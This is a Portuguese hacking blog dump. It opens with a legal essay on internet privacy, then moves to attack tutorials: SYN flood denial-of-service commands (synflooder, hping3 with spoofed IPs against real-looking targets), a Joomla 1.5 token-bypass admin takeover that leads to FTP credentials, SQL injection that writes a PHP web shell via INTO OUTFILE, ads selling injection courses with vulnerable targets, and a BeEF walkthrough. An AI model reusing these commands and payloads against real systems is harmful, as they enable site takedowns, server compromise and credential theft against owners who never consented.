invasão de privacidade na internet é crime

Na virada do terceiro milênio, dois acontecimentos foram notoriamente marcantes em nossa história contemporânea. Uma delas fora a globalização, que avançou fronteiras e possibilitou o intercâmbio de novas experiências econômicas comerciais e tecnológicas. Outro marco inevitável foi o advento da internet que acelerou e democratizou o acesso e o tráfico de informações em todo globo terrestre. Um indiano em uma velocidade instantânea consegue trocar dados ilimitados ou se comunicar com um australiano em outro continente em questão de segundos sem ao menos sair de casa, ambos usando um computador e um servidor de acesso para efetuar esse procedimento.

Em 1969, meados da guerra fria, o projeto militar ARPANET da agência de projetos avançados (ARPA) do Departamento de Defesa norte-americano confiou em 1969 à Rand Corporation, um sistema de telecomunicações que garantisse que um ataque russo não interrompesse as comunicações dos EUA (1). Em 1989 nasceu a WWW (World Wide Web), ou simplesmente teia de alcance mundial compostos por hipertextos onde se transformou numa nova ferramenta de comunicação e avanço na aldeia global , chegando à marca de 800 milhões de usuários navegando pela Internet até 2004 (2). A Internet teve seu boom em 1998, podendo ser definido como uma ampla rede que conecta um ilimitado número de computadores em todo o planeta. Depois dessa rápida introdução, passaremos a comentar sinteticamente sobre o tema Intimidade e Privacidade. Ora a intimidade como a privacidade, estão inseridos no direito de personalidade, que são divididos em 03 (três) espécies: os direitos físicos, direitos psíquicos e direitos morais.
Um grande unanimidade de juristas comungam que o marco teórico acerca do direito à intimidade teve origem com a dupla de advogados anglo-americanos Samuel D. Warren e Louis D. Brandeis com seu famoso artigo intitulado como “The right of privacy” (o direito à privacidade), publicado na Havard Law Review em 15 de dezembro de 1890 (3). Tal artigo se preocupava em determinar um princípio legal para dar guarida a intimidades das pessoas haja vista o uso não autorizado de fotografias. Sem embargo, Brandeis e Warren para aperfeiçoarem seus estudos adquiriram a expressão “right to be alone” (direito de ser deixado em paz) da autoria do juiz norte-americano Cooley, de sua obra publicada em 1873 (The Elements of torts) onde ele se referia ao “direito de estar só” (3), com vistas à proteção da pessoa e para a segurança do indivíduo (4).

Na Declaração Universal dos Direitos Humanos, proclamada pela ONU, em 1948, o art. 12 tem a seguinte redação: “Ninguém será sujeito a interferências na sua vida privada, na sua família, no seu lar ou na sua correspondência nem a ataques à sua honra e à sua reputação. Toda pessoa tem direito à proteção da lei contra tais interferências ou ataques”.

No Brasil, a nossa atual Constituição Federal (1988) remete-nos ao artigo 5º, inciso X, que de maneira explícita descreve, que são invioláveis a honra, a intimidade, a vida privada e a imagem das pessoas, sendo assegurado o direito à indenização pelo dano material ou dano moral decorrente da violação desses direitos. Visualizando um círculo, a vida privada seria ele, e a intimidade o seu núcleo. Um o gênero, o outro a espécie.
Depois dessa brevíssima análise da origem da Internet e do princípio fundamental da inviolabilidade da intimidade e da vida privada, passamos a discutir sobre a invasão da privacidade através do “mal” uso da internet.

Uma das maiores celeumas gira em torno do SPAM, abreviatura de “Spiced Ham – presunto picante” que se originou de um seriado (Monty Python) dos anos 80 onde humoristas ingleses bolaram um quadro em que uma garçonete oferecia o produto incessantemente, se assemelhando ao Spam. Não demorou muito para fossem batizadas com esse nome (5). O Spam é definido como aquelas mensagens indesejadas que são enviadas à sua caixa postal diariamente, sem a sua autorização. O pior é que não se sabe como tais mensagens conseguiram chegar a sua caixa postal. Propagandas de toda ordem, correntes da sorte, remédios como Viagra, aumento peniano, empréstimos, são os spams que mais circulam nos webmails ou dentro do Outlook Express. Desde que o usuário autorize o envio de mensagens, a título didático, informativo ou comercial, a operação é permitida, apesar, de sempre existirem abusos, onde a privacidade e a intimidade das pessoas são invadidas hodiernamente.

Um exemplo de invasão de ordem privada seria a violação de correspondência. As mensagens eletrônicas ou e-mails, até chegarem ao seu verdadeiro destinatário, podem ser passíveis de prévia leitura e até adulteração. Existe uma corrente doutrinária que ressalta que o e-mail equivale ao cartão-postal, pois, também vem aberto, sendo visível a qualquer pessoa, não se tratando então, de violação de correspondência. Já outra corrente diz que violar correspondência (de qualquer natureza) de outrem é crime, fazendo referência ao artigo 151 do Código Penal que reza: “Devassar indevidamente o conteúdo de correspondência fechada, dirigida a outrem”. Assegurado pela Carta Política também dispõe, em seu artigo 5º, inciso XII: “É inviolável o sigilo da correspondência e das comunicações telegráficas, de dados e das comunicações telefônicas, salvo, no último caso por ordem judicial, nas hipóteses e na forma que a lei estabelecer para fins de investigação criminal ou instrução processual penal.”

Outro caso nítido de invasão de privacidade são os Cookies. Os cookies consistem em arquivos gravados pelo servidor no disco rígido do usuário, os quais armazenam informações sobre os hábitos do mesmo. Toda vez que o internauta acessa uma home-page, esse endereço fica gravado no banco dados do servidor. Até aí não existe óbice nenhum, o problema é que os cookies podem ser usados com outra destinação, qual seja, o meramente mercadológico. Através do cruzamento de banco de dados, empresas compram dos provedores informações essenciais, chamados de “dados sensíveis” para remeterem suas propostas comerciais devassando a vida privada e/ou a sua intimidade de outrem, onde o usuário não imagina como tal empresa levantou esses dados ou conhece tão a fundo suas preferências íntimas. Essas informações são utilizadas para traçar o perfil do potencial consumidor que ora se desperta nesse novo veículo de comunicação e comercialização.

Questão polêmica é a invasão nas Salas de bate-papo e chats. Dentro daquela sala se instala uma conversa em tempo-real entre pessoas com afinidades e assuntos específicos onde trocam informações sobre suas vidas privadas e a intimidade de cada um. O problema surge quando um estranho invade aquela sala, impedindo o fluxo de comunicação, observando sem ser observado, ou até invadindo a conversa alheia sem ser convidado.
Existe também a invasão de privacidade pelas empresas aos seus empregados. Nessas empresas, funcionários trocam e-mails entre eles, entram em salas de bate-papo, “baixam” arquivos, fazem pesquisas, compras, pagam contas, dentro do local de trabalho, utilizando-se dos recursos da empresa para afazeres pessoais. O problema ocorre quando as empresas começam a fiscalizar seus empregados através desse mal-uso da Internet. Instalam-se senhas, softwares de bloqueio, políticas de controle, para tentar minimizar os prejuízos causados pelos mesmos, pois o uso indevido e freqüente da Internet nos locais de trabalho pode ensejar diversos problemas dessa alçada, desde a queda do rendimento dos funcionários, atraso no envio e recebimento de dados, custos desnecessários com energia elétrica, provedor, conta telefônica, ocasionado até desfazimento de negócios, por causa das linhas ocupadas, no caso de acesso discado, e.g.

Na solução dos problemas mencionados, existe a saída técnica através de filtros potentes, firewalls, op-outs (spams), políticas de controle, e ultimamente a criptografia, interagindo sempre com o profissional de informática ou o técnico de sistema de informação. Contudo, a necessidade legislativa é patente, não só a nível nacional, como mundial. Três linhas de pensamento se deságuam entre os juristas e profissionais de direito de informática. A primeira onde ressalta que se o ordenamento jurídico (leis e códigos) vigente já serie suficiente para tratar dos problemas que surgirem dentro do âmbito da net ou com o uso dela (como uma ferramenta no alcance de seus objetivos). A segunda corrente só se satisfaria com uma nova legislação específica ou um “Código de Informática” para tratar a cerca dos palpitantes temas que se originam dia a dia no direito digital, dentre eles a invasão de privacidade informática. E, uma terceira, entende que deveria ser adotada uma Codificação Informática Internacional, através da unificação de tratados e convenções para se almejar um consenso globalizado no que tange à efetiva aplicabilidade das leis, esferas de competência, visando a proteção dos usuários a todo tipo de ataque ou turbação à intimidade e privacidade através do meio eletrônico.

Mais importante do que a implantação de softwares de última geração, sistemas de proteção, uma criptografia forte e/ou uma efetiva regulamentação, é a prevalência de uma de nossas maiores conquistas no capítulo da história dos direitos fundamentais, qual seja, o princípio da dignidade da pessoa humana estatuído no inciso III, do artigo 1º, da Magna Carta. Tal postulado deve ser o fio condutor de todas as relações dos indivíduos dentro e fora da Internet, sempre primando pelo pudor ao próximo e o respeito às condições mínimas inerentes à personalidade e conduta humana, dependendo do caso, até sacrificando e abrindo mão de instrumentos tecnológicos perversos com intuito de constranger e violar a intimidade do indivíduo e retroceder o inevitável progresso da humanidade.

Guilherme Tomizawa é Advogado. Bacharel em Administração e Direito pela UTP – PR. Especialista em Direito de Família pela PUC – PR. Mestre em Direito pela UGF – RJ. Professor de Direito Civil da OPET. Membro do Instituto Brasileiro de Direito Eletrônico. Publicou em 2008 o livro “A invasão de privacidade através da internet pela JM Editora. E-mail: gtadvocacia@hotmail.com

Artigo publicado no Caderno de Direito e Justiça, no Jornal “O Estado do Paraná”, dia 10/10/2004, p.11.

Notas:

(1) Cf. PAESANI, Liliana Minardi. “Direito e Internet – liberdade de informação, privacidade e responsabilidade civil. Editora Atlas S/A. São Paulo. 2000. p.25

(2) Revista VEJA. Editora Abril. Edição 1874. Ano 37. nº 40. 06/10/2004, “A Vida Sem Fio” p.102

(3) Cf. FARIAS. Edilsom Pereira de. Colisão de Direitos. Porto Alegre; Sérgio Antônio de Fabris Editor. 1996. p.112/113.

(4) Cf. TEPEDINO, Gustavo. Problemas de direito constitucional. Editora Renovar. 2ª tiragem. Rio de Janeiro. 2001. p.111/112

(5) Revista Super Interessante. Editora Abril. Edição nº 203.Set/2004.“O que há por trás desse SPAM?”. p.49

Posted in ataques, Invasao, normal, seguranca em rede | 0 comments

como tirar um site do ar hacker

como tirar um site do ar hacker – Introdução ao ataque com synflooder.c
Iae galera, vou demostrar como realizar um ataque SYN Flood pra derrubar sites (hosts), quem não conhece muito SYN Flood, recomendo que leia mais sobre o mesmo.

Eu usarei 2 metodos para realizar o ataque, um será usando a ferramenta synflooder.c outro sera usando o hping3 para tirar um site do ar(hacker)

Você pode baixar o hping no link abaixo:
synflooder.c —> http://www.4shared.com/file/119205535/bd36c580/SYN_Floodertar.html
hping —> http://www.hping.org/download.html

Obs: Para quem usa Debian, é muito fácil de instalar basta digitar:
# apt-get install hping3

Para quem usa OpenSUSE basta digitar:
# yast install hping3

Para quem usa Fedora basta digitar:
# yum install hping3
——————————————————————————————-

Agora o primeiro passo para realizar o ataque com o synflooder.c é compila-lo:
# gcc synflooder.c -o synflooder

Obs: geralmente as pessoas reclaman de dar erro na compilação, uns merda… Pois, basta pegar algumas biblilhotecas que estarão faltando em alguns casos.

# ./synflooder

Gimme: ./synflooder <host> <port>
# ./synflooder 189.23.199.200 80

Connected No: 0
Connected No: 1
Connected No: 2
Connected No: 3
Connected No: 4
Connected No: 5
Connected No: 6
Connected No: 7
Connected No: 8
Connected No: 9
Connected No: 10
Connected No: 11
Connected No: 12
Connected No: 13
Connected No: 14
Connected No: 15
Connected No: 16

Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.

Obs: na minha opniao este ataque serve somente para passar medo em alguma pessoa, pois o servidor so fica fora do ar por alguns minutinhos básicos.
———————————————————————————————

ataque com HPING3

O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.

Atacando
O comando usado sera este:
hping3 –flood –syn -a ip_falso -e “Message” -S -s porta ip_alvo

Então no konsole vamos fazer assim:
#hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

O resultado sera que o alvo ira ficar OFF:
# hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

HPING 201.40.22.164 (ppp0 201.40.22.164): S set, 40 headers + 16 data bytes

[main] memlockall(): Success

Warning: can’t disable memory paging!

hping in flood mode, no replies will be shown

———————————————————————————————–

Espero que tenham gostado do tutorial.

ESTE FOI O TUTORIAL PRATICO. VOU CRIAR AGORA O TUTORIAL ESPLICATIVO QUE É O MAIS IMPORTANTE.

como tirar um site do ar hacker

Posted in ataques, Ataques DDOS | 0 comments

sql injection joomla 1.5 website-invadir

sql injection joomla 1.5 website, invadir este framework parecia ser dificil, mas agora com esta falha divulgada. fica tudo mais facil…

Esta falha nos dar acesso ao admin do joomla

Ache um auvo que tenha a versão do joomla 1.5 para testar.

NOSSO AUVO: www.auvo.com.br

Primeiro, temos que adicionar as variáveis via

GET: ?option=com_user&view=reset&layout=confirm
exemplo: www.auvo.com.br/?option=com_user&view=reset&layout=confirm

Abrirá uma pagina que pedirá o TOKEN(código de verificação de usuario).

Quando você entrar no link com a string ele irá pedir um Token você colocar ' ou uma aspa simples ' e vai clicar em enviar.

Veja a imagem abaixo:

Depois de clicar em enviar, ele vai pedir para informar a senha para altera-la,você apenas vai inserir a mesma senha nos dois campos e vai clicar em enviar:

É isso ai, galera.
Agora é só usufluir do mal feito. Entre no link http://www.auvo.com.br/administrator/ o Login é Admin e a senha a que você informou:

Depois clique em login.

Agora passe o Mouse sobre a aba Site e clique em configuração:

Então você irá ver 3 opções Site,Sistema,Servidor, clique na opção Servidor nesta página você vai encontrar o senha do FTP:

Agora, com o FTP. Você consegui tudo.

bY: http://www.segurancaemrede.com

Posted in ataques, Ataques Sqlinjection, Invasao, sqlinjection | 2 comments

como enviar arquivo-virus para um servidor com sql injection

Como enviar um arquivo virus para um servidor com sql injection – Existem varias formas de enviar um arquivo para um servidor, porem neste caso iremos utilizar a forma do sql injection.

A maioria das pessoas sabe que a injeção SQL permite que atacantes para recuperar registros do banco de dados, passe telas de login, alterar conteudo no banco de dados, porem poucas pessoas sabem que é possivel enviar um arquivo para o servidor através do banco de dados, ou seja, caso o servidor esteja vulneravel, o atacante pode injetar um codigo malicioso para enviar um arquivo shell, virus, arquivo em geral para o servidor e atravez do mesmo ter acesso root ao servidor do auvo.

Esquecendo o metodo iniciante para passar por telas de login e senha e ter acesso ao CMS ou area restrita, agora iremos para o metodo um pouco mais avançado.

Comando 1 – INTO OUTFILE – Criar arquivo e escrever no mesmo
MySQL tem um comando embutido que pode ser usado para criar e gravar arquivos de sistema. Este comando tem o seguinte formato:
mysql> select “aqui é o texto que ficará dentro do arquivo, neste caso .TXT” INTO OUTFILE “httpdocs/pasta/arquivo.txt”.
Uma grande desvantagem deste comando é que ele pode ser adicionado a uma consulta existente usando uma SQL para UNIÃO.
Por exemplo, pode ser anexado a seguinte consulta:

select user, password from user where user=”admin” and password=’123′ union
select “text”,2 into outfile “/tmp/file.txt” — ‘

ou seja, podemos adicionar um arquivo de modo muito facil.

Comando 2 – LOAD_FILE – ler arquivos do servidor

MySQL tem um comando interno que pode ser usado para ler arquivos arbitrários. A sintaxe é muito simples. Vamos usar este comando para o plano B.
mysql> select load_file(“path_to_file”);

Este comando arquivo que nem precisa explicar como funciona.

WEBSHELL
WebShell é uma ferramenta muito utilizada nos dias atuais.

Podemos utilizar os comandos acima para criar uma shell, sendo que nesta shell irá executar comandos a partir do navegador web. Muito usado.

Vamos criar um WebShell muito simples que irá executar comandos shell independente do sistema operacional.
Aqui está o código de uma base muito simples em PHP.

<?php echo shell_exec($_GET['cmd']); ?>
para quem não sabe ler programação, pegue um livro já e começe a ler. O comando acima está irá executar comandos a partir de codigos passados via GET, exemplo: http://www.auvo.com.br/shell.php?cmd=ls

O exemplo acima ira listar todos os arquivos e pastas do servidor.

Exploit injeção de SQL – criar web shell
Você precisa adicionar a seguinte string para o comando SQL:
UNION SELECT “<?php echo shell_exec($_GET['cmd']); ?>”, 2,3,4 INTO OUTFILE “/ var / www / html / temp / c.php” -
Algumas explicações:
• 2,3,4 são apenas qualificador que costumava fazer o mesmo número de colunas, como na primeira parte da consulta seleção.
• / var / www / html é um diretório web default nas distribuições RedHat-like (Fedora, CentOS).

BY: invkloip

Posted in ataques, Ataques Sqlinjection, DB, sqlinjection, tipos de invasao, Virus | 0 comments

Como tratar sql injection

Aqui vem mais um de meus tutoriais… E hoje vamos falar sobre, como tratar sql injection, ou seja como evitar erros de sql injection permitir ataques em meu site.

Vou dar um exemplo em PHP.

1 – Uma boa forma de evitar ataques de sql injection é retirando os principais caracteres usados em ataques maliciosos.

function nosql($string){

$string =str_replace(“‘”,”",$string);//aqui retira aspas simples <’>

$string =str_replace(“\\”,”",$string);//aqui retira barra invertida<\\>

$string =str_replace(“UNION”,”",$string);//aqui retiro o comando UNION <UNION>

return $string

}

2 – Outra forma tambem bastante usada é o comando: mysql_real_escape_string

mais informações no link: http://php.net/manual/pt_BR/function.mysql-real-escape-string.php

3 – Você pode tambem criar funcoes anti-sqlinjection para numeros/codigos.

Um exemplo bom é quando você passa um codigo via GET['codid'] ou POST['codid'].

Ao receber esta variavel via get/post você pode validar si realmente é numero ou string.

Codigo:

if (is_numeric($_GET['codid'])==false) {
   $cod           =get_magic_quotes_gpc() ? stripslashes($_GET['codid']) : $_GET['codid'];
   $cod = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($cod) : mysql_escape_string($cod);
$cod           =(int)$cod;

}else{

print 'error';
header("location:error.php");
exit; }

seguranca em redes .com

Posted in ataques, Ataques Sqlinjection, sqlinjection | 0 comments

como tirar um site/host do ar, derrubar site/host com ddos – SYN Flood

Introdução ao ataque com synflooder.c
Iae galera, vou demostrar como retirar um site/host do ar por ataque SYN Flood pra derrubar sites (hosts), quem não conhece muito SYN Flood, recomendo que leia mais sobre o mesmo.

Eu usarei 2 metodos para realizar o ataque, um será usando a ferramenta synflooder.c outro sera usando o hping3

Você pode baixar o hping no link abaixo:
synflooder.c —> http://www.4shared.com/file/119205535/bd36c580/SYN_Floodertar.html
hping —> http://www.hping.org/download.html

Obs: Para quem usa Debian, é muito fácil de instalar basta digitar:
# apt-get install hping3

Para quem usa OpenSUSE basta digitar:
# yast install hping3

Para quem usa Fedora basta digitar:
# yum install hping3
——————————————————————————————-

Agora o primeiro passo para realizar o ataque com o synflooder.c é compila-lo:
# gcc synflooder.c -o synflooder

Obs: geralmente as pessoas reclaman de dar erro na compilação, uns merda… Pois, basta pegar algumas biblilhotecas que estarão faltando em alguns casos.

# ./synflooder

Gimme: ./synflooder <host> <port>
# ./synflooder 189.23.199.200 80

Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.

ataque com HPING3

O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.

Atacando
O comando usado sera este:
hping3 –flood –syn -a ip_falso -e “Message” -S -s porta ip_alvo

Então no konsole vamos fazer assim:
#hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

O resultado sera que o alvo ira ficar OFF:
# hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

HPING 201.40.22.164 (ppp0 201.40.22.164): S set, 40 headers + 16 data bytes

[main] memlockall(): Success

Warning: can’t disable memory paging!

hping in flood mode, no replies will be shown

———————————————————————————————–

Espero que tenham gostado do tutorial.

Posted in ataques, segurança da informaçao, tipos de invasao | 2 comments

Apostila com Técnicas de invasao com sql injection

Criei uma apostila com uma serie de tecnicas para excução do famoso sql injection.

Abaixo está alguns dos assuntos abordados na apostila.

COMO COMPRAR ?

Para conseguir esta apostila Basta fazer um deposito pelo pagseguro na conta do juancarloscunha606@hotmail.com, que logo após enviarei usuario e senha da area restrita para fazer download da apostila.

COMO VOU APRENDER ?

Eu auxiliarei a todos no estudo, e disponibilizarei auvos vulneraveis a ataques.

ASSUNTOS SOBRE O APOSTILA.

Mysql básico

Criando uma query

Principio do sqlinjection

O que é sqlinjection

Teoria de sqlinjection

Regras sqlinjection

Criando um sistema de login E senha para testes

Listar dados do banco de dados com sqlinjection

Burlar uma query

Burlar um sistema de login e senha

Conseguir acesso ao banco de dados

Conseguir privilégios em um sistema

Conseguir dados de um sistema

Usando parâmetro UNION

Inserindo dados no banco de dados sem permissão

Alterando dados do banco de dados sem permissão

Excluindo dados do banco de dados sem permissão

Excluindo tabelas do banco de dados sem permissão

Excluindo database sem permissão

Descobrir nomes de tabelas do banco de dados

Descobrir nome das colunas do banco de dados

Protegendo sistema de login e senha

Protegendo dados do banco

Proteção na query

Emunizando site, sistema… do sqlinjection

Para você aprender com precisão este curso você precisa de saber:

Básico em linguagem de programação

Básico em banco de dados

Posted in ataques, Ataques Sqlinjection, normal, programacao, sqlinjection, tipos de invasao | 0 comments

O que é stuxnet, tutorial stuxnet,onde baixar o stuxnet

Agora vou falar um pouco sobre o stuxnet, o que é o stuxnet e um tutorial breve sobre o mesmo.

Stuxnet é um worm de computador projetado especificamente para atacar o sistema operacional SCADA, desenvolvido pela Siemens para controlar as centrífugas de enriquecimento de urânio iranianas. Foi descoberto em junho de 2010 pela empresa bielorrussa desenvolvedora de antivírus VirusBlokAda. É o primeiro worm descoberto que espiona e reprograma sistemas industriais. Ele foi especificamente escrito para atacar o sistema de controle industrial SCADA, usado para controlar e monitorar processos industriais. O Stuxnet é capaz de reprogramar CLPs e esconder as mudanças. O vírus pode estar camuflado em mais de 100 mil computadores, porém, para sistemas operacionais domésticos como o Windows e Mac OS X, o worm é inofensivo, só funciona efetivamente nas centrífugas de enriquecimento de urânio iranianas, já que cada usina possui sua própria configuração do sistema SCADA.

Origem do Stuxnet

A origem do Stuxnet ainda não foi definida, sabe-se que provavelmente tenha sido desenvolvido a mando de um país, teoria defendida por Mikka Hypponen, não sendo possível o seu desenvolvimento por usuários domésticos e necessitando-se de informações sobre o funcionamento da usina de difícil acesso

Ataque

O Stuxnet foi o primeiro worm de computador a incluir um rootkit de CLP. Também é o primeiro worm conhecido a ter como alvo infraestrutura industrial crítica. Ainda, o alvo provável do worm foi a infraestrutura do Irã que utiliza o sistema de controle da Siemens. De acordo com jornais, a infestação do worm pode ter danificado as instalações nucleares iranianas de Natanze acabou atrasando o início da produção da usina de Bushehr. A Siemens, inicialmente, declarou que o worm não causou nenhum dano. Além do Irã, também foram afetados pelo worm Indonésia, Estados Unidos, Austrália, Inglaterra, Malásia, e Paquistão. Como a usina não tem computadores conectados à Internet, a infecção deve ter ocorrido quando um dispositivo com o vírus foi conectado aos computadores da usina.

No complexo de Dimona, no deserto de Negev, em Israel, funcionavam centrífugas nucleares virtualmente idênticas às localizadas em Natanz, o que permitiu testar o Stuxnet em condições muito próximas das reais, antes de desfechar o ataque real. O worm tinha duas funções. A primeira delas era fazer com que as centrífugas iranianas começassem a girar 40% mais rapidamente por 15 minutos, o que causava rachaduras nas centrífugas de alumínio. A segunda forma inicialmente gravava dados telemétricos de uma típica operação normal das centrífugas nucleares, sem que o alarme soasse, para depois reproduzir esse registro para os operadores dos equipamentos enquanto as máquinas, na verdade, as centrífugas estavam literalmente se destruindo sob a ação do Stuxnet sem que os funcionários soubessem.

A empresa russa desenvolvedora de antivírus Kaspersky Lab lançou um comunicado descrevendo o Stuxnet:

“Um protótipo funcional e temível de uma cyber-arma que
dará início a uma nova corrida armamentista no mundo.”

Posted in ataques, Virus | 0 comments

Apostila / Livros / tutorial sobre sql injection

Neste post abaixo vou disponibilizar nossa venda de apostilas / livros / tutoriais sobre sql injection

Eu traduzi alguns livros e também tenho outros livros já traduzidos por outras pessoas, que estou disponibilizando para todos com um baixo custo.

Esses livros são do nível iniciante ao nível avançado.

http://www.segurancaemrede.com/livros-sobre-invasao/

Posted in ataques, Ataques Sqlinjection | 0 comments

tutorial beff, explicaçao beff, ataque beff

Neste Tutorial vamos demonstrar o uso/explicacao do ataque Beef, um framework para exploits em browsers (Firefox, Opera, IE e outros navegadores), veja na sequência.

1° passo

Executar o instalador do Beef. Há duas opções (menu K—> Services —> BEFF —> Setup BeFF) ou, como usaremos aqui, via shell bash (para isso, você deve ter privilégios com root ou autenticar como root):

beff

2° passo

Digite uma senha para acessar futuramente o painel administrativo via Web do BeFF.

tutorial beff

3° passo

Como estamos testando, por sugestão usamos a palavra “teste” como senha, mas lembre-se das regras para obter uma senha forte. Em ambiente real e de produção, ao instalar este framework, verifique se não há ninguém por perto, pois a senha é exibida, não ofuscada por ******, tome cuidado.

befff

4° passo

Agora o BeFF nos orienta a abrir um browser (pode ser o Firefox ou IE) e digitarmos o IP que ele demonstra nesta tela (no meu caso foi http://192.168.1.4/beff), no seu computador pode estar um pouco diferente.

O BeFF avisa sobre um exemplo de página de Internet para testar um exploits XSS, que você pode

acessar em http://192.168.1.4/beff/example.html.

explicaçao beff

5° passo

Usando o BeFF em um browser você pode ver um painel de controle que só tem acesso quem tiver a senha administrativa, que foi configurada na instalação do BeFF.

O painel de controle do BeFF é dividido em três partes básicas:

Menu
Status
Geral

Para testarmos a eficiência do BeFF sobre exploits de browsers, já há um exemplo criado (apenas para testes mesmo), na própria página.

Esta é a página contendo uma simulação de ataque XSS Cross-posting, que por sinal, sendo em ambiente real de produção, dentro de uma empresa é bastante perigoso.

Repare agora (onde? ZOMBIES) que foi gerado um alerta no status do BeFF, demonstrando quem está atacando através do IP de origem, sistema operacional (que o atacante está usando) e até mesmo o gerenciador de janelas (no caso KDE).

Basicamente o BeFF lhe oferece isso, detecção sobre ataques por exploits em browsers (navegadores de Internet). Aqui vemos um módulo sobre exploit para IMAP4 (protocolo para emails). Para verificar os módulos você deve criar o menu “Standard Modules” e escolher o módulo que você deseja.

Este módulo é para configurar detecção de exploit para Asterisk via browser navegador.

Módulo para detecção de exploit XSS (acho que testei isso num site “bem conhecido esses dias”, humm…não vou falar quem é não. Tenho ética profissional).

Este módulo detecta informações sobre Steal Clipboard (roubo de dados do Clipboard – Copiar/Colar ou Recortar/Colar) via Browsers (navegadores) – só funciona em Internet Explorer.